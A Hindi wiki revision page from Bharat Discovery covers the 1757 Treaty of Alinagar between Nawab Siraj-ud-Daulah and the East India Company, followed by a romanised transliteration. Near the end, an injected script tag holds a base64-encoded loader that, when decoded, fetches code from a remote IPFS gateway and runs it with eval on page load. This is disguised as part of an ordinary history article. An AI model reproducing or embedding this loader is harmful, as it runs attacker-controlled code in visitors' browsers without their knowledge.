Difference between revisions of "अलीनगर की संधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "सिक़्क़े" to "सिक्के")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''अलीनगर की संधि''', 9 फ़रवरी 1757 ई. को [[बंगाल]] के नवाब [[सिराजुद्दौला]] और [[ईस्ट इंडिया कम्पनी]] के बीच हुई, जिसमें [[अंग्रेज़|अंग्रेज़ों]] का प्रतिनिधित्व क्लाइब और वाटसन ने किया था। अंग्रेज़ों द्वारा [[कोलकाता|कलकत्ता]] पर दुबारा अधिकार कर लेने के बाद यह संधि की गई। इस संधि के द्वारा नवाब और ईस्ट इंडिया कम्पनी में निम्नलिखित शर्तों पर फिर से सुलह हो गई-
+
'''अलीनगर की संधि''', 9 [[फ़रवरी]] 1757 ई. को [[बंगाल]] के नवाब [[सिराजुद्दौला]] और [[ईस्ट इंडिया कम्पनी]] के बीच हुई, जिसमें [[अंग्रेज़|अंग्रेज़ों]] का प्रतिनिधित्व क्लाइव और वाटसन ने किया था। अंग्रेज़ों द्वारा [[कोलकाता|कलकत्ता]] पर दुबारा अधिकार कर लेने के बाद यह संधि की गई। इस संधि के द्वारा नवाब और ईस्ट इंडिया कम्पनी में निम्नलिखित शर्तों पर फिर से सुलह हो गई-
  
 
*ईस्ट इंडिया कम्पनी को [[मुग़ल]] बादशाह के फ़रमान के आधार पर व्यापार की समस्त सुविधाएँ फिर से दे दी गईं।
 
*ईस्ट इंडिया कम्पनी को [[मुग़ल]] बादशाह के फ़रमान के आधार पर व्यापार की समस्त सुविधाएँ फिर से दे दी गईं।
Line 5: Line 5:
 
*कलकत्ता में सिक्के ढालने का अधिकार भी उन्हें दे दिया गया तथा नवाब के द्वार कलकत्ते पर अधिकार करने से अंग्रेज़ों को जो क्षति हुई थी, उसका हर्जाना देना भी स्वीकार किया गया और दोनों पक्षों ने शान्ति बनाये रखने का एक-दूसरे से वायदा किया।
 
*कलकत्ता में सिक्के ढालने का अधिकार भी उन्हें दे दिया गया तथा नवाब के द्वार कलकत्ते पर अधिकार करने से अंग्रेज़ों को जो क्षति हुई थी, उसका हर्जाना देना भी स्वीकार किया गया और दोनों पक्षों ने शान्ति बनाये रखने का एक-दूसरे से वायदा किया।
  
'''इस संधि पर हस्ताक्षर''' करने के एक महीने बाद अंग्रेज़ों ने इसका उल्लघंन कर, कलकत्ता से कुछ मील दूर [[गंगा नदी]] के किनारे की फ़्राँसीसी बस्ती [[चन्द्रनगर]] पर आक्रमण करके उस पर अपना अधिकार कर लिया। उसके दूसरे महीने जून में अंग्रेज़ों ने [[मीर ज़ाफ़र]] और नवाब के अन्य विरोधी अफ़सरों से मिलकर [[सिराजुद्दौला]] के विरुद्ध षड़यंत्र रचा। इस षड़यंत्र के परिणाम स्वरूप '''23 जून 1757 ई. को प्लासी की लड़ाई हुई, जिसमें सिराजुद्दौला हार गया तथा मारा गया।'''
+
'''इस संधि पर हस्ताक्षर''' करने के एक [[महीने]] बाद अंग्रेज़ों ने इसका उल्लघंन कर, कलकत्ता से कुछ मील दूर [[गंगा नदी]] के किनारे की फ़्राँसीसी बस्ती [[चन्द्रनगर]] पर आक्रमण करके उस पर अपना अधिकार कर लिया। उसके दूसरे महीने [[जून]] में अंग्रेज़ों ने [[मीर ज़ाफ़र]] और नवाब के अन्य विरोधी अफ़सरों से मिलकर [[सिराजुद्दौला]] के विरुद्ध षड़यंत्र रचा। इस षड़यंत्र के परिणाम स्वरूप [[23 जून]], 1757 ई. को [[प्लासी का युद्ध|प्लासी की लड़ाई]] हुई, जिसमें [[सिराजुद्दौला]] हार गया तथा मारा गया।  
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 20: Line 20:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{युद्ध सन्धियाँ}}
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:03, 3 March 2013

alinagar ki sandhi, 9 faravari 1757 ee. ko bangal ke navab sirajuddaula aur eest iandiya kampani ke bich huee, jisamean aangrezoan ka pratinidhitv klaiv aur vatasan ne kiya tha. aangrezoan dvara kalakatta par dubara adhikar kar lene ke bad yah sandhi ki gee. is sandhi ke dvara navab aur eest iandiya kampani mean nimnalikhit shartoan par phir se sulah ho gee-

  • eest iandiya kampani ko mugal badashah ke faraman ke adhar par vyapar ki samast suvidhaean phir se de di geean.
  • kalakatta mean qile ki marammat ki ijazat bhi de di gee
  • kalakatta mean sikke dhalane ka adhikar bhi unhean de diya gaya tatha navab ke dvar kalakatte par adhikar karane se aangrezoan ko jo kshati huee thi, usaka harjana dena bhi svikar kiya gaya aur donoan pakshoan ne shanti banaye rakhane ka ek-doosare se vayada kiya.

is sandhi par hastakshar karane ke ek mahine bad aangrezoan ne isaka ullaghann kar, kalakatta se kuchh mil door ganga nadi ke kinare ki fraansisi basti chandranagar par akraman karake us par apana adhikar kar liya. usake doosare mahine joon mean aangrezoan ne mir zafar aur navab ke any virodhi afasaroan se milakar sirajuddaula ke viruddh sh dayantr racha. is sh dayantr ke parinam svaroop 23 joon, 1757 ee. ko plasi ki l daee huee, jisamean sirajuddaula har gaya tatha mara gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bhattachary, sachchidanand bharatiy itihas kosh, dvitiy sanskaran-1989 (hindi), bharat diskavari pustakalay: uttar pradesh hindi sansthan, 22.

sanbandhit lekh